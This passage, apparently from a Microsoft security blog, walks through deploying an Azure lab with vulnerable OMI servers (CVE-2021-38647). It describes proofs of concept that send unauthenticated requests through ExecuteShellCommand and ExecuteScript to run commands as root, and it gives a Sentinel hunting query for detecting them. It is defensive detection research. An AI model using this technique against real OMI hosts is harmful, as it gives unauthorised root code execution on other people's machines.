data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <P><STRONG>Remember that this vulnerability is actively being exploited. Therefore, make sure you do not expose your lab environment to the Internet.</STRONG></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="4" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Go to&nbsp;the following link:&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure-Sentinel2Go/grocery-list/Linux/demos/CVE-2021-38647-OMI at master · OTRF/Azure-Sentinel2Go (github.com)</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="4" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Click on the “</SPAN><I><SPAN data-contrast="auto">Deploy to Azure</SPAN></I><SPAN data-contrast="auto">” Button</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="linux_lab_deploy_button.png" style="width: 855px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311931i16B6B1518B668E5A/image-size/large?v=v2&amp;px=999" role="button" title="linux_lab_deploy_button.png" alt="linux_lab_deploy_button.png" /></span></SPAN></P> <P>&nbsp;</P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="4" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><SPAN data-contrast="auto">Fill out the following parameters:</SPAN><SPAN 
data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="4" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><SPAN data-contrast="auto">Subscription (selected by default)</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="4" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><SPAN data-contrast="auto">Resource group</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="4" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><SPAN data-contrast="auto">Region (selected by default)</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="4" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><SPAN data-contrast="auto">Admin Username</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="4" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><SPAN data-contrast="auto">Admin Password</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="4" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><SPAN data-contrast="auto">Remote Access Mode (</SPAN><I><SPAN data-contrast="auto">AllowPublicIP</SPAN></I><SPAN 
data-contrast="auto">&nbsp;selected by default. You can also use Azure Bastion Host.&nbsp;You&nbsp;would just&nbsp;need to set the&nbsp;</SPAN><I><SPAN data-contrast="auto">Allowed IP Addresses</SPAN></I><SPAN data-contrast="auto">&nbsp;parameter to *)</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="4" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><SPAN data-contrast="auto">Allowed IP Addresses (If you use the default access mode&nbsp;</SPAN><I><SPAN data-contrast="auto">AllowPublicIP</SPAN></I><SPAN data-contrast="auto">, use your home or office public IP address&nbsp;to only allow access from secure places. <STRONG>Remember that this vulnerability is actively being exploited. Therefore, make sure you do not expose your lab environment to the Internet.</STRONG></SPAN><SPAN data-contrast="auto">)</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> </LI> </UL> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="deploy_environment_parameters.png" style="width: 916px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311932i6486F9ACA5DF66CC/image-size/large?v=v2&amp;px=999" role="button" title="deploy_environment_parameters.png" alt="deploy_environment_parameters.png" /></span></SPAN></P> <P>&nbsp;</P> <UL> <LI><SPAN class="TextRun SCXW100673580 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW100673580 BCX8">Click the Review &gt; Create buttons to start the deployment</SPAN></SPAN><SPAN class="EOP SCXW100673580 BCX8" 
data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="deployment_in_progress.png" style="width: 502px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311933i1AAFBB48EC98F6C6/image-size/large?v=v2&amp;px=999" role="button" title="deployment_in_progress.png" alt="deployment_in_progress.png" /></span></SPAN></P> <P>&nbsp;</P> <UL> <LI><SPAN class="TextRun SCXW14026402 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW14026402 BCX8">You<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SCXW14026402 BCX8">can go to your resource group and explore all the resources being deployed</SPAN></SPAN></LI> </UL> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="resources_being_created.png" style="width: 760px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311934i3BC4C9CDFAB7AE40/image-size/large?v=v2&amp;px=999" role="button" title="resources_being_created.png" alt="resources_being_created.png" /></span></SPAN></P> <P>&nbsp;</P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="4" aria-setsize="-1" data-aria-posinset="6" data-aria-level="1"><SPAN data-contrast="auto">Wait around 5-10 minutes!&nbsp;You should be good to go!</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">Validate Deployment</SPAN><SPAN 
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <P><SPAN data-contrast="auto">Before you start researching, validate that every component was deployed and is working properly; otherwise a failed proof of concept later is hard to tell apart from a broken lab.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <H3 aria-level="2"><FONT size="5"><SPAN data-contrast="none">OMI Server</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H3> <P><SPAN data-contrast="auto">SSH to each virtual machine and check the OMI version to confirm it is&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">1.6.8-0</SPAN></A><SPAN data-contrast="auto">. This is the vulnerable build, and the lab deploys it on purpose: the fix shipped in OMI 1.6.8-1, so a VM that reports 1.6.8-1 or later has been patched and the proofs of concept below will fail against it.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <PRE>/opt/omi/bin/omiserver -v</PRE> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="validate_omi_server_version.png" style="width: 742px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311939iA31C642B149B6E0A/image-size/large?v=v2&amp;px=999" role="button" title="validate_omi_server_version.png" alt="validate_omi_server_version.png" /></span></SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Check that the omid service is running</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <PRE><SPAN data-contrast="auto">systemctl status omid</SPAN><SPAN 
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></PRE> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="validate_omid_server_is_running.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311940i75C039806DED7E93/image-size/large?v=v2&amp;px=999" role="button" title="validate_omid_server_is_running.png" alt="validate_omid_server_is_running.png" /></span></SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Check that OMI is listening on TCP port 5986 (netstat ships in the net-tools package, so you may need to update your package index and install it first). This is the listener that the proofs of concept below send their requests to, and it is what makes the vulnerability reachable over the network, so confirm it is exposed only to the Allowed IP Addresses you set during deployment.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <PRE>netstat -na | grep :5986</PRE> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="validate_omi_5986_port.png" style="width: 836px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311941i82E8345DF5CD987D/image-size/large?v=v2&amp;px=999" role="button" title="validate_omi_5986_port.png" alt="validate_omi_5986_port.png" /></span></SPAN></P> <P>&nbsp;</P> <H3 aria-level="2"><FONT size="5"><SPAN data-contrast="none">AUOMS Setup</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H3> <P><SPAN data-contrast="auto">Check that the AUOMS service is running, using the following two commands:</SPAN><SPAN 
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <PRE>sudo /opt/microsoft/auoms/bin/auomsctl status</PRE> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="validate_auoms_server_is_running.png" style="width: 703px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311942iB4C73CCF37824EE4/image-size/large?v=v2&amp;px=999" role="button" title="validate_auoms_server_is_running.png" alt="validate_auoms_server_is_running.png" /></span></SPAN></P> <P>&nbsp;</P> <PRE>systemctl status auoms</PRE> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="validate_auoms_server_is_running_2.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311943i406C396C794104F2/image-size/large?v=v2&amp;px=999" role="button" title="validate_auoms_server_is_running_2.png" alt="validate_auoms_server_is_running_2.png" /></span></SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Check that events are being sent to the&nbsp;</SPAN><STRONG><SPAN 
data-contrast="auto">OMS Agent</SPAN></STRONG><SPAN data-contrast="auto">:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="11" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Open a second SSH session to the virtual machine. In the first session, run the following command:</SPAN></LI> </UL> <P>&nbsp;</P> <PRE>sudo /opt/microsoft/auoms/bin/auomsctl monitor</PRE> <P>&nbsp;</P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="10" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Then, in the second session, run&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">whoami.&nbsp;</SPAN></STRONG><SPAN data-contrast="auto">If everything is connected properly, the audit event for that command shows up in the first session, as shown below:</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="validate_auoms_can_send_events.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311944i73AAC7959DD3EE21/image-size/large?v=v2&amp;px=999" role="button" title="validate_auoms_can_send_events.png" alt="validate_auoms_can_send_events.png" /></span></SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">You can continue using `</SPAN><STRONG><SPAN data-contrast="auto">sudo /opt/microsoft/auoms/bin/auomsctl monitor`&nbsp;</SPAN></STRONG><SPAN data-contrast="auto">if you 
want to do research locally. You can have it running while you test the exploitation of the OMI vulnerability.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <H3 aria-level="2"><FONT size="5"><SPAN data-contrast="none">Azure Sentinel</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H3> <P><SPAN data-contrast="auto">Check if logs are being sent to your Azure Sentinel&nbsp;instance.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="6" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="none"><A href="#" target="_blank" rel="noopener">https://portal.azure.com/</A></SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="6" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Azure Sentinel</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="validate_azure_sentinel.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311945iDD106A4E8BC76C2D/image-size/large?v=v2&amp;px=999" role="button" title="validate_azure_sentinel.png" alt="validate_azure_sentinel.png" /></span></SPAN></P> <P>&nbsp;</P> <UL> <LI><SPAN class="TextRun SCXW2347696 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW2347696 BCX8">Click on `logs` and explore the `Syslog` table</SPAN></SPAN><SPAN class="EOP SCXW2347696 BCX8" 
data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="validate_syslog_events_are_flowing.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311946iFE26DCDE940CDF9D/image-size/large?v=v2&amp;px=999" role="button" title="validate_syslog_events_are_flowing.png" alt="validate_syslog_events_are_flowing.png" /></span></SPAN></P> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">Learning&nbsp;About the&nbsp;OMI vulnerability</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <P><SPAN data-contrast="auto">After validating that everything was deployed properly, you should be ready to run a few public proofs of concept against the OMI vulnerability.</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">One thing to remember is that there are three ways to execute arbitrary code via OMI. 
They are all part of the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><STRONG><SPAN data-contrast="none">SCX RunAsProvider</SPAN></STRONG></A><STRONG><SPAN data-contrast="auto">&nbsp;</SPAN></STRONG><SPAN data-contrast="auto">and their execution context varies a little bit.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="1" aria-setsize="-1" data-aria-posinset="4" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">ExecuteCommand</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="1" aria-setsize="-1" data-aria-posinset="4" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">ExecuteShellCommand</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="1" aria-setsize="-1" data-aria-posinset="4" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">ExecuteScript</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P>&nbsp;</P> <H3 aria-level="2"><FONT size="5"><SPAN data-contrast="none">Run Public POC&nbsp;(ExecuteShellCommand)</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H3> <OL> <LI><SPAN data-contrast="auto">SSH to machine A</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI 
data-leveltext="%1." data-font="Calibri" data-listid="13" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">SSH to machine B</SPAN></LI> <LI data-leveltext="%1." data-font="Calibri" data-listid="13" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">On machine A, prepare the request that you want to send to machine B:</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN> <OL> <LI data-leveltext="%1." data-font="Calibri" data-listid="13" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Build the request without an Authorization header. The missing header is the vulnerability itself: the unpatched OMI server treats an unauthenticated request as if it came from root, so whatever you ask it to run executes with root privileges.</SPAN></LI> <LI data-leveltext="%1." data-font="Calibri" data-listid="13" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Set the command you want to execute. For this example we execute “</SPAN><STRONG><SPAN data-contrast="auto">id”.</SPAN></STRONG></LI> <LI data-leveltext="%1." data-font="Calibri" data-listid="13" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Use the&nbsp;ExecuteShellCommand&nbsp;method in the request data.</SPAN></LI> </OL> </LI> <LI data-leveltext="%1." 
data-font="Calibri" data-listid="13" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Send the HTTP request to machine B</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </OL> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="execute_poc_executeshellcommand.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311960i66DD4736803880E7/image-size/large?v=v2&amp;px=999" role="button" title="execute_poc_executeshellcommand.png" alt="execute_poc_executeshellcommand.png" /></span></P> <P>&nbsp;</P> <H3 aria-level="2"><FONT size="5"><SPAN data-contrast="none">Explore data in Azure Sentinel&nbsp;(ExecuteShellCommand)</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H3> <P><SPAN data-contrast="auto">You can run the following hunting query to explore the execution context. It pulls the AUOMS_EXECVE records out of the Syslog table, parses the audit fields and keeps only shells that ran as root from the SCX temporary directory:</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <PRE>Syslog
  | parse SyslogMessage with "type=" EventType " audit(" * "): " EventData
  | where EventType =~ "AUOMS_EXECVE" and EventData has '/var/opt/microsoft/scx/tmp'
  | project TimeGenerated, EventType, Computer, EventData
  | parse EventData with * "syscall=" syscall " syscall_r=" * " success=" success " exit=" exit " a0" *
      " ppid=" ppid " pid=" pid " audit_user=" audit_user " auid=" auid " user=" user " uid=" uid " group=" group
      " gid=" gid " effective_user=" effective_user " euid=" euid " set_user=" set_user " suid=" suid
      " filesystem_user=" filesystem_user " fsuid=" fsuid " effective_group=" effective_group " egid=" egid
      " set_group=" set_group " sgid=" sgid " filesystem_group=" filesystem_group " fsgid=" fsgid " tty=" tty
      " ses=" ses " comm=\"" comm "\" exe=\"" exe "\"" * "cwd=\"" cwd "\"" * "name=\"" name "\"" * "cmdline=\"" cmdline "\"" *
  | where uid == '0'
  | where cwd == '/var/opt/microsoft/scx/tmp'
  | where comm == 'sh'
  | extend Timestamp = TimeGenerated, HostCustomEntity = Computer, AccountCustomEntity = user</PRE> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="executeshellcommand_kql_query.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311948i6E82A05388A19212/image-size/large?v=v2&amp;px=999" role="button" title="executeshellcommand_kql_query.png" alt="executeshellcommand_kql_query.png" /></span></SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">The results show the command running as root (uid 0) with the current working directory (cwd) set to </SPAN><STRONG><SPAN data-contrast="auto">/var/opt/microsoft/scx/tmp</SPAN></STRONG><SPAN data-contrast="auto">. That directory is an indicator that repeats across the other two RunAsProvider methods of executing arbitrary code through the OMI vulnerability, so the same query serves for all three. Summarize the results by cmdline to identify initial outliers; the command lines that appear only once or twice are the ones to look at first.</SPAN><SPAN><BR /></SPAN></P> <P>&nbsp;</P> <H3 aria-level="2"><FONT size="5"><SPAN data-contrast="none">Run Public POC&nbsp;(ExecuteScript)</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H3> <OL> <LI><SPAN data-contrast="auto">SSH to machine A</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="%1." 
data-font="Calibri" data-listid="16" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">SSH to machine B</SPAN></LI> <LI data-leveltext="%1." data-font="Calibri" data-listid="16" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">On machine A, prepare the data that you want to send to machine B</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN> <OL> <LI data-leveltext="%1." data-font="Calibri" data-listid="16" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Request without authorization header</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="%1." data-font="Calibri" data-listid="16" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Set the script you want to execute:</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN> <OL> <LI data-leveltext="%1." data-font="Calibri" data-listid="16" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Pick a command. Let's say&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">whoami</SPAN></STRONG><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="%1." 
data-font="Calibri" data-listid="16" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Base64 encode the command:&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">d2hvYW1p</SPAN></STRONG><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </OL> </LI> <LI data-leveltext="%1." data-font="Calibri" data-listid="16" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Use the&nbsp;ExecuteScript method in data.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </OL> </LI> <LI data-leveltext="%1." data-font="Calibri" data-listid="16" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Send HTTP request</SPAN></LI> </OL> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="execute_poc_executescript.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311958i543F243D2FF89FD5/image-size/large?v=v2&amp;px=999" role="button" title="execute_poc_executescript.png" alt="execute_poc_executescript.png" /></span></SPAN></P> <P>&nbsp;</P> <H3 aria-level="2"><FONT size="5"><SPAN data-contrast="none">Explore data in Azure Sentinel&nbsp;(ExecuteScript)</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H3> <P><SPAN data-contrast="auto">You can run the previous hunting query again and explore the results. 
